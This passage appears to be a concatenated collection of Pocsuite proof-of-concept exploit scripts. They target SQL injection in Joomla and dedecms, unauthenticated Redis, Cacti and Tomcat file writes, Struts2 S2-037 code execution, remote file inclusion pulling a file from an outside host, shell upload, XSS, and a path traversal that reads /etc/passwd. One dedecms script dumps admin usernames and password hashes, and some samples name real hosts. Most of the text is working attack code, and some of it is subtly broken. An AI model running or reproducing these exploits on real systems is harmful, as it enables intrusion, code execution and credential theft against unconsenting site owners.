9 |
10 | from pocsuite.utils import register
11 |
12 |
13 |
14 | class TestPOC(POCBase):
15 |
16 | vulID = '87242'
17 |
18 | version = '1'
19 |
20 | vulDate = '2014-08-31'
21 |
22 | author = 'anonymous'
23 |
24 | createDate = '2015-09-30'
25 |
26 | updateDate = '2015-09-30'
27 |
28 | references = ['http://www.sebug.net/vuldb/ssvid-87242']
29 |
30 | name = 'Joomla Spider Calendar SQL Injection'
31 |
32 | appPowerLink = 'http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329'
33 |
34 | appName = 'Joomla Spider Calendar Component'
35 |
36 | appVersion = '<= 3.2.6'
37 |
38 | vulType = 'SQL Injection'
39 |
40 | desc = 'Joomla Spider Calendar Component SQL Injection in index.php, calendar_id param'
41 |
42 | samples = ['']
43 |
44 |
45 |
46 | def _attack(self):
47 |
48 | return self._verify()
49 |
50 |
51 |
52 | def _verify(self, verify=True):
53 |
54 | result = {}
55 |
56 | payload = '||exp(~(select*from(select md5(456546))a))'
57 |
58 | vul_url = '%s/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1' % self.url
59 |
60 | response = req.get(vul_url + payload).content
61 |
62 |
63 |
64 | if 'e02f052b7d3db73f99d4f5801f2b6fff' in response:
65 |
66 | result['VerifyInfo'] = {}
67 |
68 | result['VerifyInfo']['URL'] = self.url
69 |
70 |
71 |
72 | return self.parse_attack(result)
73 |
74 |
75 |
76 | def parse_attack(self, result):
77 |
78 | output = Output(self)
79 |
80 |
81 |
82 | if result:
83 |
84 | output.success(result)
85 |
86 | else:
87 |
88 | output.fail('failed')
89 |
90 |
91 |
92 | return output
93 |
94 | register(TestPOC)
--------------------------------------------------------------------------------
/_170815_Redis_all_unauthorized.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import socket
5 | import urlparse
6 | from pocsuite.utils import register
7 | from pocsuite.poc import Output, POCBase
8 |
9 |
10 | class TestPOC(POCBase):
11 | vulID = '00002'
12 | version = '1'
13 | author = 'jeffzhang'
14 | vulDate = '2017-08-15'
15 | createDate = '2017-08-15'
16 | updateDate = '2017-08-15'
17 | references = [
18 | 'http://blog.knownsec.com/2015/11/\
19 | analysis-of-redis-unauthorized-of-expolit/']
20 | name = 'Redis 未授权访问'
21 | appPowerLink = 'https://www.redis.io'
22 | appName = 'Redis'
23 | appVersion = 'All'
24 | vulType = 'Unauthorized'
25 | desc = '''
26 | redis 默认没有开启相关认证,黑客直接访问即可获取数据库中所有信息。
27 | '''
28 | samples = ['128.36.23.111']
29 |
30 | def _verify(self):
31 | result = {}
32 | payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
33 | s = socket.socket()
34 | socket.setdefaulttimeout(4)
35 | try:
36 | host = self.url.split(':')[1].strip('/')
37 | if len(self.url.split(':')) > 2:
38 | port = int(self.url.split(':')[2].strip('/'))
39 | else:
40 | port = 6379
41 | s.connect((host, port))
42 | s.send(payload)
43 | data = s.recv(1024)
44 | if data and 'redis_version' in data:
45 | result['VerifyInfo'] = {}
46 | result['VerifyInfo']['url'] = self.url
47 | result['VerifyInfo']['port'] = port
48 | result['VerifyInfo']['result'] = data[:20]
49 | except Exception as e:
50 | print e
51 | s.close()
52 | return self.parse_attack(result)
53 |
54 | def _attack(self):
55 | return self._verify()
56 |
57 | def parse_attack(self, result):
58 | output = Output(self)
59 | if result:
60 | output.success(result)
61 | else:
62 | output.fail("someting error")
63 | return output
64 |
65 |
66 | register(TestPOC)
67 |
--------------------------------------------------------------------------------
/dede_guestbook_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 | import sys
5 | from bs4 import BeautifulSoup
6 |
7 | from pocsuite.net import req
8 | from pocsuite.poc import POCBase,Output
9 | from pocsuite.utils import register
10 |
11 | class Fuckdede(POCBase):
12 | vulID='2'
13 | version = '1'
14 | author = ['fengxuan']
15 | vulDate = '2016-2-13'
16 | createDate = '2016-2-13'
17 | updateDate = '2016-2-13'
18 | references = ['http://www.evalshell.com', 'http://www.moonsec.com/post-13.html']
19 | name = 'dedecms plus/guestbook.php 注入漏洞利用EXP'
20 | appPowerLink = 'http://www.dedecms.cn/'
21 | appName = 'dedecms'
22 | appVersion = '5.7'
23 | vulType = 'SQL Injection'
24 | desc = '''
25 | 开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
26 | 带入了SQL语句中,可以通过\字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
27 | 此注入为报错注入,可以通过UpdateXML函数进行注入。
28 | '''
29 | samples = ['']
30 |
31 | def _verify(self):
32 | result = {}
33 | target = self.url + "/plus/guestbook.php"
34 | response = req.get(target)
35 | content = response.content
36 | soup = BeautifulSoup(content, 'lxml')
37 | msgid = None
38 | for line in soup.findAll('a'):
39 | if line.get('href').startswith('guestbook.php?action=admin'):
40 | msgid = line.get('href')[30:]
41 | break
42 | if msgid == None:
43 | print "No msgid find,don't fuck this vulu"
44 | payload = self.url + "/plus/guestbook.php?action=admin&job=editok&id={0}&msg=',msg=user(),email='".format(msgid)
45 | req.get(target)
46 | target = self.url + "/plus/guestbook.php"
47 | response = req.get(target)
48 | content = response.content
49 | for line in soup.findAll('td', attrs={'class':'msgtd'}):
50 | if line.text.find('@localhost') >= 0:
51 | result = {'VerifyInfo':{}}
52 | result['VerifyInfo']['URL'] = self.url
53 | return self.parse_result(result)
54 |
55 | def _attack(self):
56 | return self._verify()
57 |
58 | def parse_result(self, result):
59 | output = Output(self)
60 |
61 | if result:
62 | output.success(result)
63 | else:
64 | output.fail("Internet Nothing returned")
65 | return output
66 |
67 | register(Fuckdede)
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/_170812_Cacti_all_file_upload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
8 |
9 | class TestPOC(POCBase):
10 | vulID = '00001'
11 | version = '1'
12 | author = 'jeffzhang'
13 | vulDate = '2017-08-12'
14 | createDate = '2017-08-12'
15 | updateDate = '2017-08-12'
16 | references = ['http://www.wooyun.org/bugs/wooyun-2010-0179762']
17 | name = 'Cacti WeatherMap插件漏洞 PoC'
18 | appPowerLink = 'https://www.cacti.com'
19 | appName = 'Cacti'
20 | appVersion = 'All'
21 | vulType = 'File Upload'
22 | desc = '''
23 | Cacti 的 weathermap 插件,可写入任意文件
24 | '''
25 | samples = ['http://202.29.104.34']
26 |
27 | def _verify(self):
28 | result = {}
29 | payload = '/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=\
30 | &node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=\
31 | &link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=\
32 | Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7'
33 | vulurl = self.url + payload
34 | verurl = self.url + '/plugins/weathermap/configs/test.php'
35 | req.get(vulurl)
36 | req_ver = req.get(verurl)
37 | if req_ver.status_code == 200 and '46ea1712d4b13b55b3f680cc5b8b54e8' in req_ver.content:
38 | result['VerifyInfo'] = {}
39 | result['VerifyInfo']['URL'] = self.url
40 | result['VerifyInfo']['Payload'] = payload
41 | return self.parse_attack(result)
42 |
43 | def _attack(self):
44 | return self._verify()
45 |
46 | def parse_attack(self, result):
47 | output = Output(self)
48 | if result:
49 | output.success(result)
50 | else:
51 | output.fail('Internet noting return')
52 | return output
53 |
54 |
55 | register(TestPOC)
56 |
--------------------------------------------------------------------------------
/_180323_180219_Tomcat_7_PUT_RCE.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Author : jeffzhang
4 | # @Time : 2018/01/10
5 | # @File : _180219_Tomcat_7_PUT_RCE.py.py
6 | # @Desc : ""
7 |
8 |
9 | from pocsuite.api.request import req
10 | from pocsuite.api.poc import register
11 | from pocsuite.api.poc import Output, POCBase
12 | import random
13 | import time
14 |
15 |
16 | class TestPOC(POCBase):
17 | name = "Tomcat Remote Code Execution"
18 | vulID = ''
19 | author = 'jeffzhang'
20 | vulType = 'code execution'
21 | version = '1.0'
22 | references = ''
23 | desc = '''Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability'''
24 | vulDate = '2017-9-19'
25 | createDate = '2017-9-19'
26 | updateDate = '2017-9-20'
27 | appName = 'Apache Tomcat'
28 | appVersion = '7.0.0 - 7.0.79'
29 | appPowerLink = ''
30 | samples = []
31 |
32 | def _attack(self):
33 | return self._verify()
34 |
35 | def _verify(self):
36 | result = {}
37 | a = random.randint(100000, 900000)
38 | b = random.randint(100000, 900000)
39 | body = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
40 | <%out.println({0}+{1});%>""" .format(str(a), str(b))
41 | url = self.url
42 | resp = req.options(url+'/asda',timeout=10)
43 | if 'allow' in resp.headers and resp.headers['allow'].find('PUT') > 0:
44 | shell_url = url + "/" + str(int(time.time())) + '.jsp/'
45 | resp1 = req.put(shell_url, body)
46 | print resp1.status_code
47 | resp2 = req.get(shell_url[:-1])
48 | c = a + b
49 | if resp1.status_code == 201 and str(c) in resp2.content:
50 | result['VerifyInfo'] = {}
51 | result['VerifyInfo']['URL'] = url
52 | return self.parse_output(result)
53 |
54 | def parse_output(self, result):
55 | output = Output(self)
56 | if result:
57 | output.success(result)
58 | else:
59 | output.fail('Internet nothing returned')
60 | return output
61 |
62 |
63 | register(TestPOC)
64 |
--------------------------------------------------------------------------------
/_160615_Struts2_037_rce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | # import os
4 | import random
5 | from pocsuite.api.request import req
6 | from pocsuite.api.poc import register
7 | from pocsuite.api.poc import Output, POCBase
8 |
9 |
10 | class TestPOC(POCBase):
11 | vulID = '91857' # ssvid
12 | version = '1.0'
13 | author = ['']
14 | vulDate = ''
15 | createDate = '2016-06-15'
16 | updateDate = '2016-06-15'
17 | references = ['http://www.seebug.org/vuldb/ssvid-91857']
18 | name = 'Struts2 方法调用远程代码执行漏洞(S2-037)'
19 | appPowerLink = 'http://struts.apache.org/'
20 | appName = 'Apache Struts'
21 | appVersion = ''
22 | vulType = 'Code Execution'
23 | desc = '''
24 | '''
25 | samples = ['']
26 | install_requires = ['']
27 |
28 | def _attack(self):
29 | return self._verify()
30 |
31 | def _verify(self):
32 | result = {}
33 | # payload = "http://172.16.176.226:8080/struts2-rest-showcase/orders/3"
34 | rand_num1 = random.randint(300, 3000)
35 | rand_num2 = random.randint(600, 6000)
36 | result_str = str(rand_num1) + str(rand_num2)
37 | payload = "/%28%23yautc5yautc%3D%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3F"
38 | payload += "@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29.print%28"
39 | payload += "%23parameters.t1[0]%2B%23parameters.t2[0]%29%3Aindex.xhtml?t1={}&t2={}".format(
40 | rand_num1, rand_num2)
41 |
42 | payload_url = self.url + payload
43 | response = req.get(payload_url)
44 | if result_str in response.content:
45 | result['VerifyInfo'] = {}
46 | result['VerifyInfo']['URL'] = response.url
47 | # Write your code here
48 |
49 | return self.parse_output(result)
50 |
51 | def parse_output(self, result):
52 | # parse output
53 | output = Output(self)
54 | if result:
55 | output.success(result)
56 | else:
57 | output.fail('Internet nothing returned')
58 | return output
59 |
60 |
61 | register(TestPOC)
62 |
--------------------------------------------------------------------------------
/FlashChat _= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '63921' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2006-09-06'
13 | createDate = '2015-11-16'
14 | updateDate = '2015-11-16'
15 | references = ['http://www.sebug.net/vuldb/ssvid-63921']
16 | name = 'FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability'
17 | appPowerLink = 'N/A'
18 | appName = 'FlashChat'
19 | appVersion = '<=4.5.7'
20 | vulType = 'Other'
21 | desc = '''
22 | FlashChat在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞以Web进程权限执行任意命令。
23 | FlashChat的/inc/cmses/aedating4CMS.php、/inc/cmses/aedatingCMS.php和/inc/cmses/aedatingCMS2.php脚本
24 | 没有正确验证dir[inc]变量用户输入,远程攻击者通过包含本地或外部资源的任意文件导致执行任意脚本代码。
25 | '''
26 | samples = ['']
27 |
28 | def _attack(self):
29 | result = {}
30 |
31 | #远程文件内容是
32 | payload='http://tool.scanv.com/wsl/php_verify.txt?'
33 | #漏洞测试地址
34 | expUrl='{url}/inc/cmses/aedating4CMS.php?dir[inc]={py}'.format(url=self.url,py=payload)
35 | try:
36 | response=req.get(expUrl, headers=self.headers, timeout=50)
37 | match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response.content)
38 | if match:
39 | result['VerifyInfo'] = {}
40 | result['VerifyInfo']['URL'] = expUrl
41 | else:
42 | result={}
43 | except:
44 | result={}
45 | return self.parse_output(result)
46 |
47 | def _verify(self):
48 | result = {}
49 | #Write your code here
50 |
51 | return self.parse_output(result)
52 |
53 | def parse_output(self, result):
54 | #parse output
55 | output = Output(self)
56 | if result:
57 | output.success(result)
58 | else:
59 | output.fail('Internet nothing returned')
60 | return output
61 |
62 |
63 | register(TestPOC)
--------------------------------------------------------------------------------
/Max's Image Uploader Shell Upload Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import urlparse
7 |
8 | class TestPOC(POCBase):
9 | vulID = '67514' # ssvid
10 | version = '1.0'
11 | author = ['hfloveyy']
12 | vulDate = '2010-01-26'
13 | createDate = '2015-12-08'
14 | updateDate = '2015-12-08'
15 | references = ['http://www.sebug.net/vuldb/ssvid-67514']
16 | name = 'Max's Image Uploader Shell Upload Vulnerability'
17 | appPowerLink = 'http://www.phpf1.com'
18 | appName = 'PHP F1 Max's Image Uploader'
19 | appVersion = '1.0'
20 | vulType = 'File upload vulnerability'
21 | desc = '''
22 | PHP F1 Max's Image Uploader 1.0版本的maxImageUpload/index.php中存在无限制文件上传漏洞。
23 | 当Apache未被设置来处理具有pjpeg或jpeg扩展名的拟态文件时,远程攻击者可以通过上传具有一个pjpeg或jpeg扩展名的文件,执行任意代码,并借助对original/的一个直接请求来访问该文件。
24 | '''
25 | samples = ['127.0.0.1']
26 |
27 | def _attack(self):
28 | result = {}
29 | #Write your code here
30 |
31 | return self.parse_output(result)
32 |
33 | def _verify(self):
34 | result = {}
35 | testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php')
36 | vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php')
37 |
38 | payload = {'myfile':('1.php','','image/jpeg')}
39 | data = {'submitBtn':'Upload'}
40 |
41 |
42 |
43 |
44 | req.post(vulurl,files = payload,data = data).content
45 | resp = req.get(testurl)
46 | if '5a8adb32edd60e0cfb459cfb38093755' in resp:
47 | result['VerifyInfo'] = {}
48 | result['VerifyInfo']['URL'] = vulurl
49 | result['VerifyInfo']['Payload'] = payload
50 | #Write your code here
51 |
52 | return self.parse_output(result)
53 |
54 | def parse_output(self, result):
55 |
56 |
57 | #parse output
58 | output = Output(self)
59 | if result:
60 | output.success(result)
61 | else:
62 | output.fail('Internet nothing returned')
63 | return output
64 |
65 |
66 | register(TestPOC)
--------------------------------------------------------------------------------
/Gizzar _= 03162002 (index.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '64305' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2006-12-13'
13 | createDate = '2015-12-19'
14 | updateDate = '2015-12-19'
15 | references = ['http://www.sebug.net/vuldb/ssvid-64305']
16 | name = 'Gizzar <= 03162002 (index.php) Remote File Include Vulnerability'
17 | appPowerLink = 'N/A'
18 | appName = 'Gizzar'
19 | appVersion = '03162002'
20 | vulType = 'Remote File Include'
21 | desc = '''
22 | Gizzar 03162002及早期版本的index.php脚本存在PHP远程文件包含漏洞,
23 | 远程攻击者可以借助basePath参数中的URL执行任意PHP代码。
24 | '''
25 | samples = ['']
26 |
27 | def _attack(self):
28 | result = {}
29 | return self.parse_output(result)
30 |
31 | def _verify(self):
32 | #利用index.php文件验证RFI漏洞
33 | result = {}
34 | #
35 | payload='http://tool.scanv.com/wsl/php_verify.txt?'
36 | #测试用的payload
37 | vulurl='{url}/index.php?basePath={evil}'.format(url=self.url,evil=payload)
38 | #伪造的HTTP头
39 | httphead = {
40 | 'Host':'www.google.com',
41 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
42 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
43 | 'Connection':'keep-alive'
44 | }
45 | #发送测试请求
46 | resp=req.get(vulurl,headers=httphead,timeout=50)
47 | #md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
48 | match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.content)
49 | #如果成功匹配到md5('3.1416'),证明漏洞验证成功
50 | if match:
51 | #返回测试信息
52 | result['VerifyInfo'] = {}
53 | result['VerifyInfo']['URL'] = self.url
54 | return self.parse_output(result)
55 |
56 | def parse_output(self, result):
57 | #parse output
58 | output = Output(self)
59 | if result:
60 | output.success(result)
61 | else:
62 | output.fail('Internet nothing returned')
63 | return output
64 |
65 |
66 | register(TestPOC)
--------------------------------------------------------------------------------
/Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
9 | class TestPOC(POCBase):
10 | vulID = 'SSV-82196' # vul ID
11 | version = '1'
12 | author = 'fenghh'
13 | vulDate = '2006-9-21'
14 | createDate = '2015-10-16'
15 | updateDate = '2015-10-16'
16 | references = ['http://www.securityfocus.com/bid/20137']
17 | name = 'Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS'
18 | appPowerLink = 'http://sourceforge.net/projects/bandsitecms/'
19 | appName = 'Grayscale BandSite CMS'
20 | appVersion = '1.1.0'
21 | vulType = 'XSS'
22 | desc = '''
23 | Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize
24 | user-supplied input data.These issues may allow an attacker to access sensitive information, execute arbitrary
25 | server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of
26 | an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based
27 | authentication credentials; other attacks are possible.Version 1.1.0 is vulnerable; other versions may also be affected.
28 | '''
29 | # the sample sites for examine
30 | samples = ['']
31 |
32 | def _verify(self):
33 | payload = "/includes/footer.php?this_year="
34 | res = req.get(urljoin(self.url, payload), timeout=5)
35 | return self.parse_verify(res, payload, 'xss')
36 |
37 | def parse_verify(self, res, payload, type):
38 | output = Output(self)
39 | result = {}
40 | if type == 'xss' and '>alert(/Dirorder/)<' in res.content:
41 | result['VerifyInfo'] = {}
42 | result['VerifyInfo']['URL'] = urljoin(self.url, payload)
43 | output.success(result)
44 | else:
45 | output.fail('Internet Nothing returned')
46 | return output
47 |
48 | def _attack(self):
49 | return self._verify()
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_jequoteform - Local File Inclusion.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '68611' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2010-06-01'
13 | createDate = '2015-12-08'
14 | updateDate = '2015-12-08'
15 | references = ['http://www.sebug.net/vuldb/ssvid-68611']
16 | name = 'Joomla Component com_jequoteform - Local File Inclusion'
17 | appPowerLink = 'www.joomla.org'
18 | appName = 'Joomla Component com_jequoteform'
19 | appVersion = 'N/A'
20 | vulType = 'Local File Inclusion'
21 | desc = '''
22 | Joomla!的JE Quotation Form (com_jequoteform)组件存在目录遍历漏洞。
23 | 远程攻击者可以借助脚本index.php中的view参数中的".."符读取任意的文件,也可能导致其他未明影响。
24 | '''
25 | samples = ['']
26 |
27 | def _attack(self):
28 | result = {}
29 | return self.parse_output(result)
30 |
31 | def _verify(self):
32 | #下面以读取/etc/passwd文件的内容为例子验证漏洞
33 | result = {}
34 | filename='/etc/passwd'
35 | url='/index.php'
36 | exploit='?option=com_jequoteform&view='
37 | dBs='../'*5+'..'
38 | ends='%00'
39 | #测试的URL地址
40 | vulurl=self.url+url+exploit+dBs+filename+ends
41 | #伪造的HTTP头
42 | httphead = {
43 | 'Host':'www.google.com',
44 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
45 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
46 | 'Connection':'keep-alive'
47 | }
48 | resp=req.get(vulurl,headers=httphead,timeout=50)
49 | if resp.status_code==200 and re.match('root:.+?:0:0:.+?:.+?:.+?', resp.content):
50 | result['VerifyInfo'] = {}
51 | result['VerifyInfo']['URL'] = vulurl
52 | result['Fileinfo']={}
53 | result['Fileinfo']['Filename']=filename
54 | result['Fileinfo']['Content']=resp.content
55 | return self.parse_output(result)
56 |
57 | def parse_output(self, result):
58 | #parse output
59 | output = Output(self)
60 | if result:
61 | output.success(result)
62 | else:
63 | output.fail('Internet nothing returned')
64 | return output
65 |
66 |
67 | register(TestPOC)
--------------------------------------------------------------------------------
/IIS 系列 Http.sys 处理 Range 整数溢出漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import socket
5 | import random
6 | from urlparse import urljoin
7 | from pocsuite.net import req
8 | from pocsuite.poc import POCBase, Output
9 | from pocsuite.utils import register
10 | from lib.utils.funs import url2ip
11 |
12 |
13 | class TestPOC(POCBase):
14 | vulID = '89233' # vul ID
15 | version = '1'
16 | author = ['cnyql']
17 | vulDate = '2015-04-14'
18 | createDate = '2015-04-16'
19 | updateDate = '2015-09-19'
20 | references = ['http://www.sebug.net/vuldb/ssvid-89233']
21 | name = 'IIS 系列 Http.sys 处理 Range 整数溢出漏洞'
22 | appPowerLink = 'http://www.iis.net/'
23 | appName = 'Miscrosoft IIS httpd'
24 | appVersion = 'N/A'
25 | vulType = 'Buffer Overflow'
26 | desc = '''
27 | 2015年04月14日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys 中的漏洞可能允许远程执行代码。
28 | '''
29 |
30 | def _verify(self):
31 |
32 | ip = url2ip(self.url)
33 | hexAllFfff = "18446744073709551615"
34 | flag = False
35 | req1 = "GET /HTTP/1.0\r\n\r\n"
36 | req = "GET /HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
37 |
38 | client_socket =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
39 | client_socket.connect((ip, 80))
40 | client_socket.send(req1)
41 | boringResp = client_socket.recv(1024)
42 |
43 | if "Microsoft" in boringResp:
44 | client_socket.close()
45 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
46 | client_socket.connect((ip,80))
47 | client_socket.send(req)
48 | goodResp = client_socket.recv(1024)
49 |
50 | if "Requested RangeNot Satisfiable" in goodResp:
51 | flag = True
52 |
53 | return self.parse_verify(flag)
54 |
55 | def parse_verify(self, flag):
56 | output = Output(self)
57 | result = {}
58 |
59 | if flag:
60 | result['VerifyInfo'] = {}
61 | result['VerifyInfo']['URL'] = res.url
62 | output.success(result)
63 |
64 | else:
65 | output.fail('No vulnerability found.')
66 |
67 | return output
68 |
69 | def _attack(self):
70 | return self._verify()
71 |
72 |
73 | register(TestPOC)
74 |
--------------------------------------------------------------------------------
/joomla! 组件GoogleSearch (CSE) V3.0.2 参数q XSS漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '1' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2015-08-29'
13 | createDate = '2016-01-15'
14 | updateDate = '2016-01-15'
15 | references = ['http://www.sebug.net/vuldb/ssvid-']
16 | name = 'joomla! 组件GoogleSearch (CSE) V3.0.2 参数q XSS漏洞'
17 | appPowerLink = 'http://www.kksou.com'
18 | appName = 'joomla!'
19 | appVersion = '3.0.2'
20 | vulType = 'XSS漏洞'
21 | desc = '''
22 | joomla! 组件GoogleSearch (CSE)的3.0.2版本的参数q由于过滤不严,导致存在反射型XSS漏洞。
23 | 远程攻击者可以利用该漏洞执行html代码。该漏洞验证的POC如下所示:
24 | http://XXX/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q=">
25 | 验证的截图如下:http://pan.baidu.com/s/1i4tiZE9
26 | '''
27 | samples = ['http://ufoforce.com']
28 |
29 | def _attack(self):
30 | return self._verify()
31 |
32 | def _verify(self):
33 | #验证XSS漏洞
34 | result = {}
35 | #特征字符串
36 | pars='<0x!!qaz_*'
37 | #验证的payload
38 | payload='">'
39 | #漏洞连接
40 | exploit='/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q='
41 | #构造访问地址
42 | vulurl=self.url+exploit+payload
43 | #自定义的HTTP头
44 | httphead = {
45 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
46 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
47 | 'Connection':'keep-alive'
48 | }
49 | #访问
50 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
51 | #检查
52 | if pars in resp.content:
53 | #漏洞验证成功
54 | result['VerifyInfo']={}
55 | result['VerifyInfo']['URL'] = self.url+exploit
56 | result['VerifyInfo']['Payload'] = payload
57 | return self.parse_output(result)
58 |
59 | def parse_output(self, result):
60 | #parse output
61 | output = Output(self)
62 | if result:
63 | output.success(result)
64 | else:
65 | output.fail('Internet nothing returned')
66 | return output
67 |
68 |
69 | register(TestPOC)
--------------------------------------------------------------------------------
/dede_recommend.php_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase,Output
7 | from pocsuite.utils import register
8 |
9 | class Fuckdede(POCBase):
10 | vulID='3'
11 | version = '1'
12 | author = ['fengxuan']
13 | vulDate = '2016-2-20'
14 | createDate = '2016-2-20'
15 | updateDate = '2016-2-20'
16 | references = ['http://www.evalshell.com', 'http://www.cnseay.com/3714/']
17 | name = 'dedecms plus/recommend.php 注入漏洞利用EXP'
18 | appPowerLink = 'http://www.dedecms.cn/'
19 | appName = 'dedecms'
20 | appVersion = '5.7'
21 | vulType = 'SQL Injection'
22 | desc = '''
23 | 开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
24 | 带入了SQL语句中,可以通过\字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
25 | 此注入为报错注入,可以通过UpdateXML函数进行注入。
26 | '''
27 | samples = ['']
28 |
29 | def _verify(self):
30 | result = {}
31 | target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
32 | response = req.get(target)
33 | content = response.content
34 | regex = re.compile('.*?\|(.*?)
')
35 | data = regex.search(content)
36 | if data != None:
37 | result = {'VerifyInfo':{}}
38 | result['VerifyInfo']['URL'] = self.url
39 | return self.parse_result(result)
40 |
41 | def _attack(self):
42 | result = {}
43 | target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
44 | response = req.get(target)
45 | content = response.content
46 | regex = re.compile('.*?\|(.*?)
')
47 | data = regex.search(content)
48 | if data != None:
49 | string = data.groups()
50 | result = {'VerifyInfo':{}}
51 | result['VerifyInfo']['URL'] = self.url
